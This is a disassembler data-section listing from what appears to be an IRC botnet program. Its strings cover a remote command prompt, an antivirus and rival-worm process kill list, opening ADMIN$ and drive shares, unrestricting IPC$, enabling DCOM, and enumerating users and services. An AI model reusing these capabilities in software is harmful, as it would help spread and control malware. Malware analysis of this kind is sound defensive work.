; char asc_4394FC[]
asc_4394FC db '-' ; DATA XREF: sub_418A2E+5C�o
db 3, 34h, 2
dd 2676F6Ch, 25202D03h, 6F6C2073h, 6C632067h, 65726165h
dd 64h
off_439518 dd offset aAdd ; DATA XREF: sub_418C0E+60�r
; sub_418FE5+51�r ...
; "Add"
off_43951C dd offset aAdded ; DATA XREF: sub_418C0E+2D�r
; sub_418FE5+83�r ...
; "Added"
dword_439520 dd 0 ; DATA XREF: sub_418C0E+18�r
dd offset aDelete_0 ; "Delete"
dd offset aDeleted ; "Deleted"
align 10h
dd offset aList_1 ; "List"
dd offset aListed ; "Listed"
dd 0
dd offset aStart_0 ; "Start"
dd offset aStarted ; "Started"
align 8
dd offset aStop_0 ; "Stop"
dd offset aStopped_0 ; "Stopped"
dd 1, 43958Ch, 439584h, 2, 439578h, 43956Ch, 3, 746E6F43h
dd 65756E69h, 64h, 746E6F43h, 65756E69h, 0
aPaused_0 db 'Paused',0
align 4
aPause_0 db 'Pause',0
align 4
aStopped_0 db 'Stopped',0 ; DATA XREF: .data:0043954C�o
aStop_0 db 'Stop',0 ; DATA XREF: .data:00439548�o
align 4
aStarted db 'Started',0 ; DATA XREF: .data:00439540�o
aStart_0 db 'Start',0 ; DATA XREF: .data:0043953C�o
align 4
aListed db 'Listed',0 ; DATA XREF: .data:00439534�o
align 4
aList_1 db 'List',0 ; DATA XREF: .data:00439530�o
align 4
aDeleted db 'Deleted',0 ; DATA XREF: .data:00439528�o
aDelete_0 db 'Delete',0 ; DATA XREF: .data:00439524�o
align 4
aAdded db 'Added',0 ; DATA XREF: .data:off_43951C�o
align 4
aAdd db 'Add',0 ; DATA XREF: .data:off_439518�o
; char asc_4395E0[]
asc_4395E0 db '-' ; DATA XREF: sub_418C0E+67�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoServiceSpec db '- %s: no service specified',0
unk_439604 db 2Dh ; - ; DATA XREF: sub_418C0E+51�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aErrorWithServi db '- error with service: ',27h,'%s',27h,' - %s',0
align 10h
; char asc_439630[]
asc_439630 db '-' ; DATA XREF: sub_418C0E+33�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSServiceS db '- %s service: ',27h,'%s',27h,0
; char aAnUnknownError[]
aAnUnknownError db 'An unknown error occurred: <%ld>',0 ; DATA XREF: sub_418D2A+12C�o
align 10h
; char aTheSystemIsShu[]
aTheSystemIsShu db 'The system is shutting down.',0 ; DATA XREF: sub_418D2A:loc_418E42�o
align 10h
aTheServiceHasN db 'The service has not been started.',0 ; DATA XREF: sub_418D2A:loc_418E3B�o
align 4
aTheRequested_1 db 'The requested control code cannot be sent to the service because '
; DATA XREF: sub_418D2A:loc_418E34�o
db 'the state of the service.',0
align 10h
aTheServiceHa_0 db 'The service has been marked for deletion.',0
; DATA XREF: sub_418D2A:loc_418E2D�o
align 4
aTheServiceCoul db 'The service could not be logged on. The account does not have the'
; DATA XREF: sub_418D2A:loc_418E26�o
db ' correct access rights.',0
align 4
aTheSpecified_0 db 'The specified service does not exist.',0
; DATA XREF: sub_418D2A:loc_418E1F�o
align 10h
aTheServiceHasB db 'The service has been disabled.',0 ; DATA XREF: sub_418D2A:loc_418E18�o
align 10h
aTheServiceDe_0 db 'The service depends on another service that has failed to start.',0
; DATA XREF: sub_418D2A:loc_418E11�o
align 4
aTheServiceDepe db 'The service depends on a service that does not exist or has been '
; DATA XREF: sub_418D2A:loc_418E0A�o
db 'marked for deletion.',0
align 4
aTheSpecifiedDa db 'The specified database does not exist.',0
; DATA XREF: sub_418D2A:loc_418E03�o
align 4
aAnInstanceOfTh db 'An instance of the service is already running.',0
; DATA XREF: sub_418D2A:loc_418DD8�o
align 4
aTheRequested_0 db 'The requested control code is not valid, or it is unacceptable to'
; DATA XREF: sub_418D2A:loc_418DD1�o
db ' the service.',0
align 4
aTheProcessForT db 'The process for the service was started, but it did not call Star'
; DATA XREF: sub_418D2A:loc_418DCA�o
db 'tServiceCtrlDispatcher.',0
align 10h
aAThreadCouldNo db 'A thread could not be created for the service.',0
; DATA XREF: sub_418D2A:loc_418DC3�o
align 10h
aTheDatabaseIsL db 'The database is locked.',0 ; DATA XREF: sub_418D2A+8F�o
aTheServiceCann db 'The service cannot be stopped because other running services are '
; DATA XREF: sub_418D2A:loc_418D98�o
db 'dependent on it.',0
align 4
aTheServiceBina db 'The service binary file could not be found.',0
; DATA XREF: sub_418D2A:loc_418D8E�o
aTheHandleDoesN db 'The handle does not have the required access right.',0
; DATA XREF: sub_418D2A:loc_418D84�o
aTheHandleIsInv db 'The handle is invalid.',0 ; DATA XREF: sub_418D2A:loc_418D7A�o
align 4
aTheRequestedCo db 'The requested control code is undefined.',0
; DATA XREF: sub_418D2A:loc_418D70�o
align 10h
aTheSpecifiedSe db 'The specified service name is invalid.',0 ; DATA XREF: sub_418D2A+3C�o
align 4
; char aSSS_2[]
aSSS_2 db '%s: %s (%s)',0 ; DATA XREF: sub_418EA8+EB�o
; char aStopped[]
aStopped db ' Stopped',0 ; DATA XREF: sub_418EA8:loc_418F74�o
aStarting db ' Starting',0 ; DATA XREF: sub_418EA8:loc_418F6D�o
aStoping db ' Stoping',0 ; DATA XREF: sub_418EA8:loc_418F66�o
aRunning db ' Running',0 ; DATA XREF: sub_418EA8:loc_418F5F�o
aContinuing db ' Continuing',0 ; DATA XREF: sub_418EA8:loc_418F58�o
aPausing db ' Pausing',0 ; DATA XREF: sub_418EA8:loc_418F51�o
aPaused db ' Paused',0 ; DATA XREF: sub_418EA8:loc_418F4A�o
aUnknown_0 db ' Unknown',0 ; DATA XREF: sub_418EA8+9B�o
aTheFollowingWi db 'The following Windows services are registered:',0
; DATA XREF: sub_418EA8+25�o
align 4
; char asc_439B84[]
asc_439B84 db '-' ; DATA XREF: sub_418FE5+AC�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoShareSpecif db '- %s: no share specified',0
align 4
; char asc_439BA8[]
asc_439BA8 db '-' ; DATA XREF: sub_418FE5+8A�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 68732073h, 3A657261h, 73252720h
dd 27h
; char asc_439BC4[]
asc_439BC4 db '-' ; DATA XREF: sub_418FE5+58�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithShar db '- %s: error with share: ',27h,'%s',27h,' - %s',0
align 10h
; char a14s24s6u4s[]
a14s24s6u4s db '%-14S %-24S %-6u %-4s',0 ; DATA XREF: sub_4191DB+D0�o
align 4
aNo db 'No',0 ; DATA XREF: sub_4191DB+BC�o
align 4
aYes db 'Yes',0 ; DATA XREF: sub_4191DB+B5�o
; char asc_439C10[]
asc_439C10 db '-' ; DATA XREF: sub_4191DB+76�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aShareListError db '- share list error %s <%ld>',0
align 4
aShareNameResou db 'Share name: Resource: Uses: Desc:',0
; DATA XREF: sub_4191DB+26�o
align 10h
; char asc_439C70[]
asc_439C70 db '-' ; DATA XREF: sub_4192FC+B7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSNoUsernameSpe db '- %s: no username specified',0
align 4
; char asc_439C98[]
asc_439C98 db '-' ; DATA XREF: sub_4192FC+95�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSErrorWithUser db '- %s: error with username: ',27h,'%s',27h,' - %s',0
align 4
; char asc_439CC8[]
asc_439CC8 db '-' ; DATA XREF: sub_4192FC+6D�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aSUsernameS db '- %s username: ',27h,'%s',27h,0
align 4
; char asc_439CE8[]
asc_439CE8 db '-' ; DATA XREF: sub_419443+3AF�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserInfoErrorL db '- user info error <%ld>',0
align 4
; char aUnitsPerWeekD[]
aUnitsPerWeekD db 'Units Per Week: %d',0 ; DATA XREF: sub_419443+385�o
align 10h
; char aMax_StorageD[]
aMax_StorageD db 'Max. Storage: %d',0 ; DATA XREF: sub_419443+35A�o
align 4
; char aUserSLanguageD[]
aUserSLanguageD db 'User',27h,'s Language: %d',0 ; DATA XREF: sub_419443+32F�o
; char aCountryCodeD[]
aCountryCodeD db 'Country Code: %d',0 ; DATA XREF: sub_419443+304�o
align 4
; char aWorkstationsS[]
aWorkstationsS db 'Workstations: %S',0 ; DATA XREF: sub_419443+2D9�o
align 10h
; char aLogonServerS[]
aLogonServerS db 'Logon Server: %S',0 ; DATA XREF: sub_419443+2AE�o
align 4
; char aLastLogoffD[]
aLastLogoffD db 'Last Logoff: %d',0 ; DATA XREF: sub_419443+283�o
; char aLastLogonD[]
aLastLogonD db 'Last Logon: %d',0 ; DATA XREF: sub_419443+258�o
align 4
; char aNumberOfLogins[]
aNumberOfLogins db 'Number of Logins: %d',0 ; DATA XREF: sub_419443+22D�o
align 4
; char aBadPasswordCou[]
aBadPasswordCou db 'Bad Password Count: %d',0 ; DATA XREF: sub_419443+202�o
align 4
; char aPasswordAgeD[]
aPasswordAgeD db 'Password Age: %d',0 ; DATA XREF: sub_419443+1D7�o
align 4
; char aParametersS[]
aParametersS db 'Parameters: %S',0 ; DATA XREF: sub_419443+1AC�o
align 4
; char aHomeDirectoryS[]
aHomeDirectoryS db 'Home Directory: %S',0 ; DATA XREF: sub_419443+181�o
align 4
; char aAuthFlagsD[]
aAuthFlagsD db 'Auth Flags: %d',0 ; DATA XREF: sub_419443+156�o
align 4
; char aPrivilegeLevel[]
aPrivilegeLevel db 'Privilege Level: %s',0 ; DATA XREF: sub_419443+12B�o
aGuest db 'Guest',0 ; DATA XREF: sub_419443:loc_419562�o
align 4
aUser_3 db 'User',0 ; DATA XREF: sub_419443:loc_41955B�o
align 10h
aAdministrator db 'Administrator',0 ; DATA XREF: sub_419443:loc_419554�o
align 10h
; char aCommentS[]
aCommentS db 'Comment: %S',0 ; DATA XREF: sub_419443+DA�o
; char aUserCommentS[]
aUserCommentS db 'User Comment: %S',0 ; DATA XREF: sub_419443+AF�o
align 10h
; char aFullNameS[]
aFullNameS db 'Full Name: %S',0 ; DATA XREF: sub_419443+84�o
align 10h
; char aAccountS[]
aAccountS db 'Account: %S',0 ; DATA XREF: sub_419443+50�o
; char aTotalUsersFoun[]
aTotalUsersFoun db 'Total users found: %d.',0 ; DATA XREF: sub_41982C+14F�o
align 4
; char asc_439EA4[]
asc_439EA4 db '-' ; DATA XREF: sub_41982C+F7�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aAnAccessViolat db '- an access violation has occured',0
align 10h
; char aS_4[]
aS_4 db ' %S',0 ; DATA XREF: sub_41982C+BE�o
align 4
; char asc_439ED8[]
asc_439ED8 db '-' ; DATA XREF: sub_41982C+7A�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aUserListErrorS db '- user list error %s <%ld>',0
aUsernameAccoun db 'Username accounts for local system:',0 ; DATA XREF: sub_41982C+29�o
; char aNetworkConnect[]
aNetworkConnect db 'Network connection not found.',0 ; DATA XREF: sub_4199AC:loc_419AC9�o
align 10h
aTheUserNameCou db 'The user name could not be found.',0 ; DATA XREF: sub_4199AC:loc_419AC2�o
align 4
aShareNotFound_ db 'Share not found.',0 ; DATA XREF: sub_4199AC:loc_419ABB�o
align 4
aTheComputerNam db 'The computer name is invalid.',0 ; DATA XREF: sub_4199AC:loc_419AB4�o
align 4
aAnUnknownErr_0 db 'An unknown error occurred.',0 ; DATA XREF: sub_4199AC:loc_419AAD�o
align 4
aThePasswordIsS db 'The password is shorter than required (or does not meet the passw'
; DATA XREF: sub_4199AC:loc_419A90�o
db 'ord policy requirement.)',0
align 10h
aTheGroupAlread db 'The group already exists.',0 ; DATA XREF: sub_4199AC:loc_419A89�o
align 4
aTheUserAccount db 'The user account already exists.',0 ; DATA XREF: sub_4199AC:loc_419A82�o
align 10h
aTheOperationIs db 'The operation is allowed only on the primary domain controller of'
; DATA XREF: sub_4199AC+CF�o
db ' the domain.',0
align 10h
aAGeneralFailur db 'A general failure occurred in the network hardware.',0
; DATA XREF: sub_4199AC:loc_419A57�o
aLevelParameter db 'Level parameter is invalid.',0 ; DATA XREF: sub_4199AC:loc_419A50�o
aDeviceOrDirect db 'Device or directory does not exist.',0
; DATA XREF: sub_4199AC:loc_419A49�o
aInvalidForRedi db 'Invalid for redirected resource.',0 ; DATA XREF: sub_4199AC:loc_419A3F�o
align 4
aDuplicateShare db 'Duplicate share name.',0 ; DATA XREF: sub_4199AC+89�o
align 10h
aTheNameIsInval db 'The name is invalid.',0 ; DATA XREF: sub_4199AC:loc_419A19�o
align 4
aAccessDenied_ db 'Access denied.',0 ; DATA XREF: sub_4199AC:loc_419A0F�o
align 4
aNotEnoughMemor db 'Not enough memory.',0 ; DATA XREF: sub_4199AC:loc_419A05�o
align 4
aThisNetworkReq db 'This network request is not supported.',0
; DATA XREF: sub_4199AC:loc_4199FB�o
align 4
aServerNameNotF db 'Server name not found.',0 ; DATA XREF: sub_4199AC:loc_4199F1�o
align 4
aInvalidParamet db 'Invalid parameter.',0 ; DATA XREF: sub_4199AC+3B�o
align 10h
; char asc_43A1E0[]
asc_43A1E0 db '-' ; DATA XREF: sub_419AE0+AB�o
db 3, 34h, 2
dd 274656Eh, 25202D03h, 34032073h, 76726553h, 3A037265h
dd 20532520h, 654D3403h, 67617373h, 203A0365h, 5325h
; char asc_43A20C[]
asc_43A20C db '-' ; DATA XREF: sub_419AE0+81�o
db 3, 34h, 2
db 6Eh ; n
db 65h, 74h, 2
db 3
aMessageSentSuc db '- message sent successfully',0
align 4
dword_43A234 dd 7530h ; DATA XREF: sub_419F4D+12�r
off_43A238 dd offset aRegedit_exe ; DATA XREF: sub_419C09+CB�o
; "regedit.exe"
dd offset aMsconfig_exe ; "msconfig.exe"
dd offset aNetstat_exe ; "netstat.exe"
dd offset aMsblast_exe ; "msblast.exe"
dd offset aZapro_exe ; "zapro.exe"
dd offset aNavw32_exe ; "navw32.exe"
dd offset aNavapw32_exe ; "navapw32.exe"
dd offset aZonealarm_exe ; "zonealarm.exe"
dd offset aWincfg32_exeta ; "wincfg32.exetaskmon.exe"
dd offset aPandaavengine_ ; "PandaAVEngine.exe"
dd offset aSysinfo_exe ; "sysinfo.exe"
dd offset aMscvb32_exe ; "mscvb32.exe"
dd offset aMsblast_exe_0 ; "MSBLAST.exe"
dd offset aTeekids_exe ; "teekids.exe"
dd offset aPenis32_exe ; "Penis32.exe"
dd offset aBbeagle_exe ; "bbeagle.exe"
dd offset aSysmonxp_exe ; "SysMonXP.exe"
dd offset aWinupd_exe ; "winupd.exe"
dd offset aWinsys_exe ; "winsys.exe"
dd offset aSsate_exe ; "ssate.exe"
dd offset aRate_exe ; "rate.exe"
dd offset aD3dupdate_exe ; "d3dupdate.exe"
dd offset aIrun4_exe ; "irun4.exe"
dd offset aI11r54n4_exe ; "i11r54n4.exe"
aI11r54n4_exe db 'i11r54n4.exe',0 ; DATA XREF: sub_419C09+EC�o
; .data:0043A294�o
align 4
aIrun4_exe db 'irun4.exe',0 ; DATA XREF: .data:0043A290�o
align 4
aD3dupdate_exe db 'd3dupdate.exe',0 ; DATA XREF: .data:0043A28C�o
align 4
aRate_exe db 'rate.exe',0 ; DATA XREF: .data:0043A288�o
align 10h
aSsate_exe db 'ssate.exe',0 ; DATA XREF: .data:0043A284�o
align 4
aWinsys_exe db 'winsys.exe',0 ; DATA XREF: .data:0043A280�o
align 4
aWinupd_exe db 'winupd.exe',0 ; DATA XREF: .data:0043A27C�o
align 4
aSysmonxp_exe db 'SysMonXP.exe',0 ; DATA XREF: .data:0043A278�o
align 4
aBbeagle_exe db 'bbeagle.exe',0 ; DATA XREF: .data:0043A274�o
aPenis32_exe db 'Penis32.exe',0 ; DATA XREF: .data:0043A270�o
aTeekids_exe db 'teekids.exe',0 ; DATA XREF: .data:0043A26C�o
aMsblast_exe_0 db 'MSBLAST.exe',0 ; DATA XREF: .data:0043A268�o
aMscvb32_exe db 'mscvb32.exe',0 ; DATA XREF: .data:0043A264�o
aSysinfo_exe db 'sysinfo.exe',0 ; DATA XREF: .data:0043A260�o
aPandaavengine_ db 'PandaAVEngine.exe',0 ; DATA XREF: .data:0043A25C�o
align 10h
aWincfg32_exeta db 'wincfg32.exetaskmon.exe',0 ; DATA XREF: .data:0043A258�o
aZonealarm_exe db 'zonealarm.exe',0 ; DATA XREF: .data:0043A254�o
align 4
aNavapw32_exe db 'navapw32.exe',0 ; DATA XREF: .data:0043A250�o
align 4
aNavw32_exe db 'navw32.exe',0 ; DATA XREF: .data:0043A24C�o
align 4
aZapro_exe db 'zapro.exe',0 ; DATA XREF: .data:0043A248�o
align 10h
aMsblast_exe db 'msblast.exe',0 ; DATA XREF: .data:0043A244�o
aNetstat_exe db 'netstat.exe',0 ; DATA XREF: .data:0043A240�o
aMsconfig_exe db 'msconfig.exe',0 ; DATA XREF: .data:0043A23C�o
align 4
aRegedit_exe db 'regedit.exe',0 ; DATA XREF: .data:off_43A238�o
; char aSD_0[]
aSD_0 db ' %s (%d)',0 ; DATA XREF: sub_419C09+191�o
align 10h
; char asc_43A3F0[]
asc_43A3F0 db '-' ; DATA XREF: sub_419E38:loc_419EBF�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListFai db ' process list failed',0
align 4
unk_43A414 db 2Dh ; - ; DATA XREF: sub_419E38+80�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aProcessListCom db ' process list complete',0
align 4
; char asc_43A438[]
asc_43A438 db '-' ; DATA XREF: sub_419E38+19�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 2, 3, 2Dh
aListingProcess db ' listing processes:',0
; char aPrivmsgSS_1[]
aPrivmsgSS_1 db 'PRIVMSG %s :%s',0Dh,0 ; DATA XREF: sub_419FD5+33�o
unk_43A468 db 2Dh ; - ; DATA XREF: sub_41A05C:loc_41A18E�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotReadDa db '- Could not read data from proccess.',0Dh,0Ah,0
unk_43A498 db 2Dh ; - ; DATA XREF: sub_41A05C+10F�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aProccessHasTer db '- Proccess has terminated.',0Dh,0Ah,0
align 10h
unk_43A4C0 db 2Dh ; - ; DATA XREF: sub_41A05C:loc_41A142�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aCouldNotRead_0 db '- Could not read data from proccess',0Dh,0Ah,0
align 10h
; char asc_43A4F0[]
asc_43A4F0 db '-' ; DATA XREF: sub_41A1B1+194�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aFailedToStartI db '- Failed to start IO thread, error: <%d>.',0
align 4
; char asc_43A524[]
asc_43A524 db '-' ; DATA XREF: sub_41A1B1+14C�o
db 3, 34h, 2
db 63h ; c
db 6Dh, 64h, 2
db 3
aRemoteCommandP db '- Remote Command Prompt',0
align 4
off_43A548 dd offset aIpc ; DATA XREF: sub_41A3C6+1B3�o
; sub_41A6EA+17A�o
; "IPC$"
align 10h
dd offset aAdmin_0 ; "ADMIN$"
align 8
off_43A558 dd offset dword_43A574 ; DATA XREF: sub_41A6EA+1E3�o
dd offset dword_43A570
dd offset dword_43A56C
dd offset dword_43A568
dword_43A568 dd 5C3A44h ; DATA XREF: sub_41A3C6+217�o
; .data:0043A564�o
dword_43A56C dd 2444h ; DATA XREF: .data:0043A560�o
dword_43A570 dd 5C3A43h ; DATA XREF: .data:0043A55C�o
dword_43A574 dd 2443h ; DATA XREF: .data:off_43A558�o
aAdmin_0 db 'ADMIN$',0 ; DATA XREF: .data:0043A550�o
align 10h
aIpc db 'IPC$',0 ; DATA XREF: .data:off_43A548�o
align 4
; char asc_43A588[]
asc_43A588 db '-' ; DATA XREF: sub_41A3C6+2E5�o
; sub_41A6EA+2DB�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetapi32_dllCo db '- Netapi32.dll couldn',27h,'t be loaded.',0
align 4
; char asc_43A5B8[]
asc_43A5B8 db '-' ; DATA XREF: sub_41A3C6+2CF�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesD db '- Network shares deleted.',0
align 10h
; char asc_43A5E0[]
asc_43A5E0 db '-' ; DATA XREF: sub_41A3C6:loc_41A628�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDelete db '- Failed to delete ',27h,'%S',27h,' share.',0
align 4
dword_43A60C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+25B�o
aShareSDeleted_ db '- Share ',27h,'%S',27h,' deleted.',0
align 10h
; char asc_43A630[]
asc_43A630 db '-' ; DATA XREF: sub_41A3C6:loc_41A595�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToDele_0 db '- Failed to delete ',27h,'%s',27h,' share.',0
align 4
dword_43A65C dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+1C8�o
aShareSDelete_0 db '- Share ',27h,'%s',27h,' deleted.',0
align 10h
; char asc_43A680[]
asc_43A680 db '-' ; DATA XREF: sub_41A3C6:loc_41A4F8�o
; sub_41A6EA:loc_41A818�o
db 3, 34h, 2
dd 75636573h, 3026572h
aAdvapi32_dllCo db '- Advapi32.dll couldn',27h,'t be loaded.',0
align 10h
dword_43A6B0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6:loc_41A4F1�o
aFailedToOpenIp db '- Failed to open IPC$ Restriction registry key.',0
; char asc_43A6EC[]
asc_43A6EC db '-' ; DATA XREF: sub_41A3C6:loc_41A4D3�o
db 3, 34h, 2
dd 75636573h, 3026572h
aRestrictedAcce db '- Restricted access to the IPC$ Share.',0
align 10h
dword_43A720 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+106�o
aFailedToRestri db '- Failed to restrict access to the IPC$ Share.',0
align 4
aRestrictanonym db 'restrictanonymous',0 ; DATA XREF: sub_41A3C6+ED�o
; sub_41A6EA+ED�o
align 10h
; char asc_43A770[]
asc_43A770 db '-' ; DATA XREF: sub_41A3C6+91�o
; sub_41A6EA+91�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToOpenDc db '- Failed to open DCOM registry key.',0
; char asc_43A7A0[]
asc_43A7A0 db '-' ; DATA XREF: sub_41A3C6:loc_41A433�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 64204D4Fh, 62617369h
dd 2E64656Ch, 0
dword_43A7C0 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A3C6+66�o
aDisableDcomFai db '- Disable DCOM failed.',0
align 4
aEnabledcom db 'EnableDCOM',0 ; DATA XREF: sub_41A3C6+54�o
; sub_41A6EA+54�o
align 10h
; char asc_43A7F0[]
asc_43A7F0 db '-' ; DATA XREF: sub_41A6EA+2C3�o
db 3, 34h, 2
dd 75636573h, 3026572h
aNetworkSharesA db '- Network shares added.',0
; char aC_0[]
aC_0 db '%c:\',0 ; DATA XREF: sub_41A6EA+230�o
align 4
; char aC_1[]
aC_1 db '%c$',0 ; DATA XREF: sub_41A6EA+219�o
; char asc_43A820[]
asc_43A820 db '-' ; DATA XREF: sub_41A6EA:loc_41A889�o
; sub_41A6EA:loc_41A95A�o
db 3, 34h, 2
dd 75636573h, 3026572h
aFailedToAddSSh db '- Failed to add ',27h,'%s',27h,' share.',0
dword_43A848 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA+198�o
; sub_41A6EA+269�o
aShareSAdded_ db '- Share ',27h,'%s',27h,' added.',0
dword_43A868 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA:loc_41A811�o
aFailedToOpen_0 db '- Failed to open IPC$ restriction registry key.',0
; char asc_43A8A4[]
asc_43A8A4 db '-' ; DATA XREF: sub_41A6EA:loc_41A7F3�o
db 3, 34h, 2
dd 75636573h, 3026572h
aUnrestrictedAc db '- Unrestricted access to the IPC$ Share.',0
align 4
dword_43A8DC dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA+102�o
aFailedToUnrest db '- Failed to unrestrict access to the IPC$ Share.',0
align 4
; char asc_43A91C[]
asc_43A91C db '-' ; DATA XREF: sub_41A6EA:loc_41A757�o
db 3, 34h, 2
dd 75636573h, 3026572h, 4344202Dh, 65204D4Fh, 6C62616Eh
dd 2E6465h
dword_43A938 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_41A6EA+66�o
aEnableDcomFail db '- Enable DCOM failed.',0
align 4
; char aPostHttp1_0Hos[]
aPostHttp1_0Hos db 'POST / HTTP/1.0',0Dh,0Ah ; DATA XREF: sub_41AA1E+E1�o
db 'Host: %s',0Dh,0Ah
db 'Content-Length: %d',0Dh,0Ah
db 0Dh,0Ah,0
align 10h
; char asc_43A990[]
asc_43A990 db '-' ; DATA XREF: sub_41ABFB+1A7�o
db 3, 34h, 2
dd 65657073h, 73657464h, 2D030274h, 75450220h, 65706F72h
dd 25203A02h, 626B2064h, 732F7469h, 53550220h, 203A0241h
dd 6B206425h, 2F746962h, 41022073h, 2616973h, 6425203Ah
dd 69626B20h, 20732F74h, 65764102h, 65676172h, 25203A02h
dd 626B2064h, 732F7469h, 0
aWww_google_co_ db 'www.google.co.jp',0 ; DATA XREF: sub_41ABFB+C4�o
align 4
aYahoo_co_jp db 'yahoo.co.jp',0 ; DATA XREF: sub_41ABFB+BD�o
aWww_nifty_com db 'www.nifty.com',0 ; DATA XREF: sub_41ABFB+B6�o
align 10h
aWww_d1asia_com db 'www.d1asia.com',0 ; DATA XREF: sub_41ABFB+AF�o
align 10h
aWww_st_lib_kei db 'www.st.lib.keio.ac.jp',0 ; DATA XREF: sub_41ABFB+A8�o
align 4
aWww_lib_nthu_e db 'www.lib.nthu.edu.tw',0 ; DATA XREF: sub_41ABFB+A1�o
aWww_google_com db 'www.google.com',0 ; DATA XREF: sub_41ABFB+9A�o
align 4
aWww_easynews_c db 'www.easynews.com',0 ; DATA XREF: sub_41ABFB+93�o
align 10h
aWww_above_net db 'www.above.net',0 ; DATA XREF: sub_41ABFB+8C�o
align 10h
aWww_level3_com db 'www.level3.com',0 ; DATA XREF: sub_41ABFB+85�o
align 10h
aNitro_ucsc_edu db 'nitro.ucsc.edu',0 ; DATA XREF: sub_41ABFB+7E�o
align 10h
aWww_burst_net db 'www.burst.net',0 ; DATA XREF: sub_41ABFB+77�o
align 10h
aWww_cogentco_c db 'www.cogentco.com',0 ; DATA XREF: sub_41ABFB+70�o
align 4
aWww_rit_edu db 'www.rit.edu',0 ; DATA XREF: sub_41ABFB+69�o
aWww_nocster_co db 'www.nocster.com',0 ; DATA XREF: sub_41ABFB+62�o
aWww_verio_com db 'www.verio.com',0 ; DATA XREF: sub_41ABFB+5B�o
align 10h
aWww_stanford_e db 'www.stanford.edu',0 ; DATA XREF: sub_41ABFB+54�o
align 4
aWww_xo_net db 'www.xo.net',0 ; DATA XREF: sub_41ABFB+4D�o
align 10h
aWww_google_it db 'www.google.it',0 ; DATA XREF: sub_41ABFB+46�o
align 10h
aDe_yahoo_com db 'de.yahoo.com',0 ; DATA XREF: sub_41ABFB+3F�o
align 10h
aWww_belwue_de db 'www.belwue.de',0 ; DATA XREF: sub_41ABFB+38�o
align 10h
aWww_switch_ch db 'www.switch.ch',0 ; DATA XREF: sub_41ABFB+31�o
align 10h
aWww_1und1_de db 'www.1und1.de',0 ; DATA XREF: sub_41ABFB+2A�o
align 10h
aVerio_fr db 'verio.fr',0 ; DATA XREF: sub_41ABFB+23�o
align 4
aWww_utwente_nl db 'www.utwente.nl',0 ; DATA XREF: sub_41ABFB+1C�o
align 4
aWww_schlund_ne db 'www.schlund.net',0 ; DATA XREF: sub_41ABFB+15�o
; char asc_43AB9C[]
asc_43AB9C db '-' ; DATA XREF: sub_41AF8F+297�o
db 3, 34h, 2
dd 69737973h, 26F666Eh, 2202D03h, 2555043h, 4925203Ah
dd 4D753436h, 202E7A48h, 4D415202h, 25203A02h, 20424B73h
dd 61746F74h, 25202C6Ch, 20424B73h, 65657266h, 4402202Eh
dd 26B7369h, 7325203Ah, 746F7420h, 202C6C61h, 66207325h
dd 2E656572h, 534F0220h, 57203A02h, 6F646E69h, 25207377h
dd 25282073h, 64252E64h, 7542202Ch, 20646C69h, 2E296425h
dd 79530220h, 72696473h, 25203A02h, 2202E73h, 74736F48h
dd 656D616Eh, 25203A02h, 25282073h, 202E2973h, 72754302h
dd 746E6572h, 65735520h, 203A0272h, 202E7325h, 74614402h
dd 203A0265h, 202E7325h, 6D695402h, 203A0265h, 202E7325h
dd 74705502h, 2656D69h, 7325203Ah, 2Eh
aDdMmmYyyy db 'dd:MMM:yyyy',0 ; DATA XREF: sub_41AF8F+192�o
; char aCouldnTResolve[]
aCouldnTResolve db 'couldn',27h,'t resolve host',0 ; DATA XREF: sub_41AF8F:loc_41B0F3�o
align 4
; char asc_43AC9C[]
asc_43AC9C db '-' ; DATA XREF: sub_41B243+A4�o
db 3, 34h, 2
dd 6974656Eh, 26F666Eh, 2202D03h, 65707954h, 25203A02h
dd 25282073h, 202E2973h, 20504902h, 72646441h, 2737365h
dd 7325203Ah, 4802202Eh, 6E74736Fh, 2656D61h, 7325203Ah
dd 2Eh
; char off_43ACE0[]
off_43ACE0 dd offset loc_412F4E ; DATA XREF: sub_41B243:loc_41B2AF�o
